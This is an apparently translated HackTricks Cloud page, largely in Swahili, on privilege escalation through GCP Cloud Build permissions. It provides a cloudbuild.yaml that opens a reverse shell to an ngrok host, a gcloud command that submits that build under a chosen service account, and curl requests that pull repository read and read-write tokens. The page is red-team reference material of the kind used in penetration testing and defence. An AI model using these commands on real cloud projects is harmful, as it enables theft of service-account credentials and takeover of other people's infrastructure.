HackTricks CloudGCP - Cloudbuild Privesc
Reading time: 4 minutes
tip
Jifunze na fanya mazoezi ya AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: 
HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na fanya mazoezi ya Azure Hacking: 
HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
- Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.
cloudbuild
Kwa maelezo zaidi kuhusu Cloud Build angalia:
cloudbuild.builds.create, iam.serviceAccounts.actAs
Kwa ruhusa hii unaweza kuwasilisha ujenzi wa wingu. Mashine ya cloudbuild itakuwa na kwa kawaida tokeni ya Akaunti ya Huduma ya cloudbuild katika mfumo wake wa faili: <PROJECT_NUMBER>@cloudbuild.gserviceaccount.com. Hata hivyo, unaweza kuashiria akaunti yoyote ya huduma ndani ya mradi katika usanidi wa cloudbuild.
Hivyo, unaweza tu kufanya mashine itoe tokeni hiyo kwa seva yako au pata shell ya kinyume ndani yake na upate tokeni hiyo (faili inayoshikilia tokeni inaweza kubadilika).
Utekelezaji wa moja kwa moja kupitia gcloud CLI
1- Unda cloudbuild.yaml na urekebishe kwa data yako ya msikilizaji
steps:
- name: bash
script: |
#!/usr/bin/env bash
bash -i >& /dev/tcp/5.tcp.eu.ngrok.io/14965 0>&1
options:
logging: CLOUD_LOGGING_ONLY
2- Pakia ujenzi rahisi bila chanzo, faili ya yaml na ueleze SA ya kutumia kwenye ujenzi:
gcloud builds submit --no-source --config="./cloudbuild.yaml" --service-account="projects/<PROJECT>/serviceAccounts/<SERVICE_ACCOUNT_ID>@<PROJECT_ID>.iam.gserviceaccount.com
Kutumia maktaba ya python gcloud
Unaweza kupata skripti ya asili ya exploit hapa kwenye GitHub (lakini mahali inachukua token kutoka halikufanya kazi kwangu). Kwa hivyo, angalia skripti ya kuandaa kuunda, kutumia na kusafisha mazingira yenye udhaifu hapa na skripti ya python kupata shell ya kinyume ndani ya mashine ya cloudbuild na kuiba hiyo hapa (katika msimbo unaweza kupata jinsi ya kubainisha akaunti zingine za huduma).
Kwa maelezo ya kina zaidi, tembelea https://rhinosecuritylabs.com/gcp/iam-privilege-escalation-gcp-cloudbuild/
cloudbuild.repositories.accessReadToken
Kwa ruhusa hii mtumiaji anaweza kupata token ya ufikiaji wa kusoma inayotumika kufikia hazina:
curl -X POST \
-H "Authorization: Bearer $(gcloud auth print-access-token)" \
-H "Content-Type: application/json" \
-d '{}' \
"https://cloudbuild.googleapis.com/v2/projects/<PROJECT_ID>/locations/<LOCATION>/connections/<CONN_ID>/repositories/<repo-id>:accessReadToken"
cloudbuild.repositories.accessReadWriteToken
Kwa ruhusa hii, mtumiaji anaweza kupata token ya ufikiaji wa kusoma na kuandika inayotumika kufikia hifadhi:
curl -X POST \
-H "Authorization: Bearer $(gcloud auth print-access-token)" \
-H "Content-Type: application/json" \
-d '{}' \
"https://cloudbuild.googleapis.com/v2/projects/<PROJECT_ID>/locations/<LOCATION>/connections/<CONN_ID>/repositories/<repo-id>:accessReadWriteToken"
cloudbuild.connections.fetchLinkableRepositories
Kwa ruhusa hii unaweza kupata repos ambazo muunganisho una ufikiaji:
curl -X GET \
-H "Authorization: Bearer $(gcloud auth print-access-token)" \
"https://cloudbuild.googleapis.com/v2/projects/<PROJECT_ID>/locations/<LOCATION>/connections/<CONN_ID>:fetchLinkableRepositories"
tip
Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
- Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.